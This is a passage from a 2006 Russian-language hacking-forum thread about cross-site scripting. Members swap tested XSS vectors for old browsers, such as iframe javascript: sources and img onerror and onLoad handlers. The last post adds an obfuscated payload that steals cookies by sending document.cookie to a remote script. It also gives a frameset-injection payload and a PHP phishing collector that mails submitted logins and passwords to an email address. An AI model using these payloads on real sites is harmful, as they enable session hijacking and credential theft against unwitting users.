FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
XSS крупным планом.

Страница 3 из 5

Опции темы

Поиск в этой теме

Опции просмотра

27.01.2006, 23:58

slime

Познающий

Регистрация: 08.12.2005

Сообщений: 35

Провел на форуме:
133219

Репутация: -1

А вот еще вопрос...
а можно ли как-то проводить активный КСС если у жертвы отключены картинки... я так понимаю background-image уже не пойдет... а onmouseover как-то не совсем надежно....

28.01.2006, 01:26

~~Humor~~

Banned

Регистрация: 26.01.2006

Сообщений: 19

Провел на форуме:
22474

Репутация: 0

Цитата:

Сообщение от slime

А хе, очень даже интересная тема, что именно работает в плане картинок или что нить такое если картинки отключены.

Щас буду тестировать. Я знаю, что вот так,

Код HTML:

<iframe src="javascript:alert(/wj/)">wj</iframe>

будет работать вне зависимости если браузер ИЕ, ФФ или Опера или если картинки выключены. Тоже, самый лучший способ это использовать функцию onerror=alert(/wj/) которая тоже работает во всех трех браузерах. А насчет картинок думаю протесчу может новое что нить найду.

В принципе если Джаваскрипт включен а картинки выключены, то это не беда, но мне интересно будет ли работать onerror=alert(/wj/) если картинки отключены. Ведь он будет только работать ПОСЛЕ загрузки картинки и если картинку закачать не удалось, то тогда сработает онеррор....но хотя протесчу посмотрю, что может из этого быть.

Последний раз редактировалось Humor; 28.01.2006 в 01:34..

28.01.2006, 01:41

~~Humor~~

Banned

Регистрация: 26.01.2006

Сообщений: 19

Провел на форуме:
22474

Репутация: 0

В принципе, вот только что протестил с отключенными картинками в ИЕ,

вот так

Код HTML:

<img src="javascript:alert(/wj/)">

не работает, а вот так,

Код HTML:

<img src="javascript:alert(/wj/)">
<script>onerror=alert(/wj/)</script>

- Да.

Так что если картинки отключены, то это совсем таки не беда.

Это Я типа пример дал. Onerror рулит это мое личное мнение имхо.

Надо просто уметь им пользоваться.

EDIT: Но однако опять сделал тест, onerror в этом случае работает не из-за онеррор...

Ибо так,

Код HTML:

<script>onerror=alert(/wj/)</script>

Будет тоже работать само по себе.

Ща будем еще думать.

EDIT: Кстати пока искал, понял почему онеррор работает сам по себе.

Код HTML:

<span style=background:url('javascript:wjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwj=alert(/wj/)')>wj</span>

Так тоже будет работать в ИЕ.

То есть оказывается не важно, что идет до параметров!
Они в этом случае становятся наименованиями.

Код HTML:

<script>wjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwj=alert(/wj/)</script>

Кстати если ты отключишь картинки, то ты в принципе их не отключишь, а заблокируешь автоматически закружатся вот.

Код HTML:

<img src="javascript:alert(/wj/)">

С отключенными картинками в ИЕ, ты приведешь браузер ИЕ в состояние ФФ! То есть если правой кнопкой мыши нажмешь на "view image" алерт появится! Это состояние является включенным по умолчанию в браузере Фаерфокс.

EDIT:

Кстати еще добавлю, что если написать вот так,

Код HTML:

<img src="http://forum.antichat.ru/antichat/pic/logo.gif" onLoad="alert(/wj/)">

то тоже будет алерт во всех браузерах. То есть если картинка существует.

Если же она НЕ существует,
то думаю, что всем понятно и так, что следует писать вот так,

Код HTML:

<img src="http://forum.antichat.ru/antichat/wj/logo.gif" onError="alert(/wj/)">

Последний раз редактировалось Humor; 28.01.2006 в 02:28..

04.03.2006, 18:09

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

Провел на форуме:
7426415

Репутация: 1398

Отправить сообщение для SanyaX с помощью ICQ

Молодец wj. А зачем банят не понимаю толку всё равно нету )).

__________________
-=Ok let's Go=-
-=OpenVPN=-

04.03.2006, 22:19

Tikson

Постоянный

Регистрация: 09.10.2005

Сообщений: 333

Провел на форуме:
1387660

Репутация: 74

Wj много из чужих взял
я так тоже могу завалюсь на сайт америкосов перевду их мысли и сюда сапостю

Последний раз редактировалось Green_Bear; 04.03.2006 в 23:17..

10.03.2006, 22:36

~~Web Giant~~

Banned

Регистрация: 08.03.2006

Сообщений: 16

Провел на форуме:
20089

Репутация: -1

Цитата:

Сообщение от Tikson

Wj много из чужих взял
я так тоже могу завалюсь на сайт америкосов перевду их мысли и сюда сапостю

Ссылку дай тех кого Я копирую?

Если Я на кого нить ссылаюсь, то как ты уже заметил, Я или даю ссылку или говорю автора.

Все остальное что Я здесь написал, это Я все нашел сам не зависимо от тех, кто это нашел до меня, или же после.

И ни кого Я не копирую ибо некого и копировать.

07.03.2006, 09:23

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

Провел на форуме:
7426415

Репутация: 1398

Что то ты воще не в тему сказал.

__________________
-=Ok let's Go=-
-=OpenVPN=-

10.03.2006, 06:17

~~Web Giant~~

Banned

Регистрация: 08.03.2006

Сообщений: 16

Провел на форуме:
20089

Репутация: -1

Цитата:

document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg/.source.replace(/x/g,String.fromCharCode(47))+String.fromCharCode(63) +document.cookie

Один из видов воровки кук.

Цитата:

eval(WJ=/document.write(unescape(x<frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0><frame frameborder=0 src= ></frameset>x))/.source.replace(/x/g,String.fromCharCode(34)))

Кодируем в урл то, что надо и все.

http://ha.ckers.org/xss.html

Сам файл.

PHP код:


		
			
<?

if(isset($_POST['login']) && isset($_POST['passwd'])){

mail("antichat_bar@mail.ru", "privet", $_POST['login'].":".$_POST['passwd']);

header("Location: http://www.antichat.ru/");

}

?>